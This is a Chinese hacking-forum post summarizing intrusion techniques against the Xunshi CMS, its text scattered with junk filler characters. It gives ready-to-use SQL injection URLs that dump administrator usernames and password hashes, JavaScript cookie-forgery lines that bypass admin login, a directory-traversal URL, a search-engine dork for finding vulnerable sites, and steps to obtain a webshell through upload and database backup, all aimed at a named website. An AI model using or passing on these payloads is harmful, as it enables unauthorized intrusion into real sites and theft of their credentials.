找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2697|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘
( G4 w) i$ L7 V* B0 R# q) l! K/ D; s# Y' x# D
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)
4 V+ G& M  P. z7 f9 l! {+ x0 m+ l  f$ |( r" ]9 H
以下本文总结来自黑防去年第9期杂志上的内容...
. P# T2 E9 t  {6 ~: q* ^" s8 F
' a% Q0 O0 U5 V. N( W0 X( D2 Y; k先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
$ M- N: q  k5 H- W7 n0 q
! O4 `0 k: Y* m5 z26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
4 N, Z. G8 [, ]8 b9 I. @6 n+ ]+ `; Z' q" Z; M* b0 q- ]) N
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况
* E  k; }9 D% E3 k这里一个注入
+ [# M+ H4 T0 c) c: g/ s  J0 k8 ]* u  z3 e$ K6 d7 O
效果如图:
$ F0 k# |0 U* |3 L
( r$ T6 R# w. b  v( E" o; Z2 C . q; C7 i/ x; [! Z9 a4 U
7 r- I0 X% `& H1 h8 _1 @) O
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
% C' s. Z1 f0 h6 k, }3 _. s$ ^6 p% t2 ~; a0 i4 E
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去
  q1 `# j  e2 c0 x7 P
2 m; a/ @2 @( T- Ljavascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
9 u) D7 o7 z! j* v: _0 V2 u9 G: u& @
, T$ p. y9 }6 ^0 G/ t* i那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
/ X# [+ p( Z, e5 B6 S
# [9 y- y$ P9 a因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞4 r) e- d" P# q& E2 m0 ^4 {
# m0 Y, J( {; I$ q- Y1 n$ N& h
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以% v7 [/ ^: a9 C

% u/ M- t" b% p( m% j3 y访问这页面来列目录..步骤如下:
: F8 [$ }6 u+ G7 a7 |# K2 ?; o0 U. x9 [0 C% \$ I
javascript:alert(document.cookie="admindj=1")   F3 `0 E5 T/ b1 ?; b, M6 C

5 L0 b  p1 X  q! ~0 {- \http://www.political-security.co ... asp?id=46&dir=../..
. l5 B6 q4 O) C/ S% ~. l8 K0 U1 r* t) `
) k9 R) u. L/ j/ B5 Z效果如图:2 e8 ]& ~' U# X* v4 k; H" {+ g/ [
2 K& V" r6 p( [6 W9 @

" e! P6 R4 t* {$ Z! M5 \& B; o: u  T0 G+ x4 N" P) O" A
这样全站目录都能瞧了..找到后台目录..进去..) T. z' ~. a& J+ L

1 t. `) M  j6 J) C1 i5 S5 N) x那么进了后台怎么拿shell??上传--备份就ok了..
9 |! ^2 \( |4 E: r7 L. d
9 ]- X3 k  g/ B4 F5 ]8 L5 z  _3 i那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..7 L4 D6 l$ |# _9 y5 a7 M
  A$ p3 {, Q" @1 `2 u
这个我也碰到过一次..你都可以通过列目录来实现..
9 q$ Z- g" G) J# d* n7 n5 s6 e1 {, z, b
javascript:alert(document.cookie="admindj=1") % h6 I; s! D; |3 A5 X: c! f' I
1 {# G$ D- w' J8 w
http://www.political-security.co ... p?action=BackupData 9 ^. N# M: S; @% M
9 o2 l3 @" d! f3 _" v
备份ok..
; {2 A% J. e# L1 S
3 j2 U% G# G* f4 @0 t& J, g. ^+ [# @4 ~那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
; q+ m. n, b! g# S: Y3 k& m; J" m
在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下& f; T4 i: U3 [: V' u8 H& r
- ?4 W2 Q# K7 Z8 G  l
然后访问此页面进行注入..步骤如下:
$ X7 b' X1 M$ s" }& Z
5 x$ u1 S& U5 z' w- hjavascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1"); {9 b: e* ?/ y+ d3 I/ x. V

4 B( [' a: h* I: I然后请求admin/admin_chk.asp页面
3 \9 r; e9 H$ h  Z. h* p0 f$ y7 e, [# {& x7 t2 q* W
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%
3 X- d' U1 x3 \9 s3 {3 e+ h! \7 d
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin1 W# J6 }  p4 f
/ U' z6 x5 s% N6 Y4 O! T2 a8 }$ O
效果如图所示:
! W+ H+ r- z! l: z4 f1 l( t( E& r9 E8 T/ h6 @/ k$ E3 f
6 R7 ]  z7 P8 a  N0 }$ C) {

3 U. M$ p4 J3 R0 T: @7 w讯时漏洞28 o$ G' `  p3 X
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)/ S& u  ~: G$ q1 J- L+ L' b# I
- c/ B5 _1 v( b
1、/admin/admin_news_pl_view.asp?id=1/ M( A  I& e. m
//id任意 填入以下语句
% u" i/ [3 `" P2 ]5 y1 K% \' S , @" m; P1 \9 v* j4 d; {4 S
2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!
3 N: s  @% Q  }& v8 s8 q- L $ F8 j7 |; i- s% T$ ~
5 Z1 }( t( N0 V, R4 b& t

# \5 X6 c" v3 P& w3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
$ E  m$ _3 P. O7 i  o" U
1 \5 ~% Z, ~2 a. `3 M+ ]9 b# O9 E$ @2 n

* b- }7 {* ~9 K  {8 u* o% w爆出管理员帐号和密码了
" I4 w% P7 E3 X/ \
- A1 l7 |- O+ {/ v* W5 w$ f. Z/ A! Q. }0 i' E

# o# O9 W6 P, ~4、cookies进后台
$ m  ^% M7 B' j0 i* g
9 i6 w# w5 k" v  `; l8 p' fjavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));" c+ X9 J) @# I# Z

+ P5 p8 [8 ~- w2 u4 a0 ?* q" X5 h+ M6 Y6 }0 m. |

' z5 p. u& J: s$ d5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
6 ~1 w: Y8 `1 L2 @2 G- o5 v
; a* b/ }, o( s; `' e7 m& a- S' o
" ^5 X  L) j$ Y. n) k6 X" Q  r5 A: D) Y5 |. M& a) s
6、后台有上传和备份取SHELL不难。
$ |- c. q3 E: X' g  b- }
( [" w7 [" ?- M/ D& x& E, E2 @0 X7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../..
" R: d3 M+ m' N+ n* f# S . x0 l# i  c+ F' F
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
2 }6 Q+ H6 V' @* A5 j9 H
/ S' t5 N1 f# G5 I0 n6 q
3 z& F6 U1 E4 o8 e& T9 r0 K; S$ M" \8 R# p- e
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表